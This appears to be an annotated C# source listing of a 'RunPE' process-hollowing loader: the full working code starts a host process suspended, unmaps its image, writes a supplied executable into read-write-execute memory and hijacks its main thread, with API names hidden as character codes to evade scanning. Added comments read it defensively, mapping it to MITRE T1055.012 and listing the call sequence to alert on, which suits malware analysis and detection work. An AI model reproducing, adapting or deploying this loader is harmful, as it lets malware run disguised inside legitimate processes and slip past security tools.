  1. using System;
  2. using System.Collections.Generic;
  3. using System.Data;
  4. using System.Drawing;
  5. using System.Text;
  6. using System.IO;
  7. using System.Runtime.InteropServices;
  8. using System.Resources;
  9. using System.Security.Cryptography;
  10. using System.Reflection;
  11. using Microsoft.Win32;
  12.  
  13. namespace RUNPE
  14. {
      // Analysis notes (defensive reading of this listing).
      // The class starts a host process suspended, unmaps its image, writes a PE supplied
      // as a byte array into it, redirects the main thread and resumes it. This is
      // process hollowing ("RunPE", MITRE ATT&CK T1055.012).
      // Static traits: identifiers are machine-renamed; every Win32 export name is
      // assembled from (char) codes at run time and bound through
      // Marshal.GetDelegateForFunctionPointer, so the only P/Invoke declarations in the
      // class are LoadLibraryA and one renamed import.
      // Behavioural sequence to alert on, in this order, from one managed process:
      // CreateProcessA with creation flag 4 -> GetThreadContext -> ReadProcessMemory ->
      // NtUnmapViewOfSection -> VirtualAllocEx with protection 0x40 ->
      // WriteProcessMemory (repeated) -> SetThreadContext -> ResumeThread.
      // The code is 32-bit only: it uses ToInt32 on pointers and x86 CONTEXT indices.
  15. public class FLYPATHTONORWAY1
  16. {
  17. [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  18. internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
      // No EntryPoint is set and ExactSpelling is true, so the runtime binds this import
      // under the name written here. The (hModule, procName) signature is that of
      // GetProcAddress; the name looks like renamer output.
      // NOTE(review): confirm against a compiled sample rather than this paste.
  19. [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  20. static extern IntPtr DEALER122(IntPtr hModule, string procName);
      // Delegate types for the exports resolved at run time in FLYPATHTOLASVEGAZ1.
  21. delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo); // bound to CreateProcessA (kernel32)
  22. delegate bool EXT(IntPtr hThr, uint[] ctxt); // bound to GetThreadContext (kernel32)
  23. delegate bool TEX(IntPtr t, uint[] c); // bound to SetThreadContext (kernel32)
  24. delegate uint ION(IntPtr hProc, IntPtr baseAddr); // bound to NtUnmapViewOfSection (ntdll)
  25. delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead); // bound to ReadProcessMemory (kernel32)
  26. delegate uint EAD(IntPtr hThread); // bound to ResumeThread (kernel32)
  27. delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot); // bound to VirtualAllocEx (kernel32)
  28. delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect); // bound to VirtualProtectEx (kernel32); resolved but never invoked
  29. delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); // bound to WriteProcessMemory (kernel32)
  30. delegate bool OP(byte[] bytes, string surrogateProcess); // wraps FLYPATHTOLASVEGAZ1
  31.  
      // Loads the library `name`, looks up the export `method` and returns it as a
      // delegate of type T. Neither the module handle nor the export address is checked
      // before the delegate is created.
  32. public T TEXTFILEFAS43DASF<T>(string name, string method)
  33. {
  34. return (T)(object)Marshal.GetDelegateForFunctionPointer(DEALER122(LoadLibraryA(name), method), typeof(T));
  35. }
      // Static entry point: creates an instance and calls FLYPATHTOLASVEGAZ1 through an
      // OP delegate, returning its result unchanged.
  36. public static bool AVcsCDXSAD425A(byte[] bytes, string surrogateProcess)
  37. {
  38. FLYPATHTONORWAY1 p = new FLYPATHTONORWAY1();
  39. OP F1 = new OP(p.FLYPATHTOLASVEGAZ1);
  40. bool Res = F1(bytes, surrogateProcess);
  41. return Res;
  42. }
      // bytes: a PE image, read here at fixed PE32 header offsets with no signature or
      //        length validation (an out-of-range read throws and lands in the catch).
      // surrogateProcess: passed as the command line of the host process to start.
      // Returns false only when an exception is caught. Every other path returns true,
      // including a failed CreateProcessA or a failed unmap, so the result does not
      // show whether the image was actually written.
  43. public bool FLYPATHTOLASVEGAZ1(byte[] bytes, string surrogateProcess)
  44. {
      // The character codes below decode to the names given in the trailing comments;
      // a string search of the binary for these API names finds nothing.
  45. String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50; // "kernel32"
  46. String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108; // "ntdll"
  47. ESS CP = TEXTFILEFAS43DASF<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65); // "CreateProcessA"
  48. ION NUVS = TEXTFILEFAS43DASF<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110); // "NtUnmapViewOfSection"
  49. EXT GTC = TEXTFILEFAS43DASF<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); // "GetThreadContext"
  50. TEX STC = TEXTFILEFAS43DASF<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); // "SetThreadContext"
  51. ORY RPM = TEXTFILEFAS43DASF<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); // "ReadProcessMemory"
  52. EAD RT = TEXTFILEFAS43DASF<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100); // "ResumeThread"
  53. CEX VAE = TEXTFILEFAS43DASF<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120); // "VirtualAllocEx"
  54. CTEX VPE = TEXTFILEFAS43DASF<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120); // "VirtualProtectEx" (VPE is not used afterwards)
  55. MOR WPM = TEXTFILEFAS43DASF<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); // "WriteProcessMemory"
  56. try
  57. {
  58. IntPtr procAttr = IntPtr.Zero;
      // Receives the process information; below, [0] is used as the process handle and
      // [1] as the main-thread handle. Neither handle is closed anywhere in this method.
  59. IntPtr[] processInfo = new IntPtr[4];
  60. byte[] startupInfo = new byte[0x44]; // 0x44 bytes, the 32-bit STARTUPINFO size, left zeroed
  61. int num2 = BitConverter.ToInt32(bytes, 60); // e_lfanew: file offset of the PE header
  62. int num = BitConverter.ToInt16(bytes, num2 + 6); // NumberOfSections
  63. IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54)); // SizeOfHeaders
      // Creation flag 4 is CREATE_SUSPENDED: the host process exists but has not run.
  64. if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
  65. {
      // 0xb3 uints is the size of the x86 CONTEXT structure; element 0 is ContextFlags
      // and 0x10002 requests the integer registers.
  66. uint[] ctxt = new uint[0xb3];
  67. ctxt[0] = 0x10002;
  68. if (GTC(processInfo[1], ctxt))
  69. {
      // Index 0x29 is Ebx in the x86 CONTEXT, which holds the PEB address of a thread
      // that has not started yet; PEB+8 is the ImageBaseAddress field.
  70. IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
  71. IntPtr buffer = IntPtr.Zero;
  72. IntPtr bufferSize = new IntPtr(4);
  73. IntPtr numRead = IntPtr.Zero;
      // Reads the host's current image base (4 bytes) and unmaps the image found there.
  74. if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
  75. {
  76. IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34)); // ImageBase of the supplied PE
  77. IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80)); // SizeOfImage
      // 0x3000 is MEM_COMMIT | MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE: a
      // read-write-execute region in another process, itself a strong detection signal.
      // The returned address is not checked before it is written to.
  78. IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
  79. int lpNumberOfBytesWritten;
  80. WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten); // copies the PE headers
  81. int num5 = num - 1;
      // One pass per section header (40 bytes each, table at PE header + 0xf8 for PE32).
  82. for (int i = 0; i <= num5; i++)
  83. {
  84. int[] dst = new int[10]; // section header viewed as ten ints
  85. Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
  86. byte[] buffer2 = new byte[(dst[4] - 1) + 1]; // dst[4] = SizeOfRawData
  87. Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length); // dst[5] = PointerToRawData; Convert.ToInt32(null, 2) evaluates to 0
  88. size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]); // dst[3] = VirtualAddress; 'size' is reused as the destination address
  89. addr = new IntPtr(buffer2.Length); // 'addr' is reused as the byte count
  90. WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
  91. }
      // Overwrites PEB.ImageBaseAddress in the host with the new base.
  92. size = new IntPtr(ctxt[0x29] + 8L);
  93. addr = new IntPtr(4);
  94. WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
      // Index 0x2c is Eax in the x86 CONTEXT; it is set to new base + AddressOfEntryPoint.
  95. ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
  96. STC(processInfo[1], ctxt);
  97. }
  98. }
      // Runs whenever the process was created, whether or not the steps above succeeded.
  99. RT(processInfo[1]);
  100. }
  101. }
      // Bare catch: every exception type is swallowed and reported only as 'false'.
  102. catch
  103. {
  104. return false;
  105. }
  106. return true;
  107. }
  108. }
  109. }